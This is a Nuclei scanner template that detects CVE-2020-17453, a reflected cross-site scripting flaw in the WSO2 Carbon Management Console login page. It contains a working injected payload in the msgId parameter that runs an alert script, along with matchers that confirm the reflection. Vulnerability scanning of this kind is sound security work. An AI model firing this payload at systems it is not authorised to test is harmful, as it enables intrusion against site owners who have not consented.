nuclei-templates/cves/2020/CVE-2020-17453.yaml

41 lines
1.2 KiB
YAML

id: CVE-2020-17453
info:
name: WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting
author: madrobot
severity: medium
description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
reference:
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132
- https://nvd.nist.gov/vuln/detail/CVE-2020-17453
- https://twitter.com/JacksonHHax/status/1374681422678519813
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-17453
cwe-id: CWE-79
tags: xss,wso2,cve2020,cve
requests:
- method: GET
path:
- '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "'';alert('nuclei')//';"
part: body
- type: word
words:
- "text/html"
part: header
# Enhanced by mp on 2022/05/04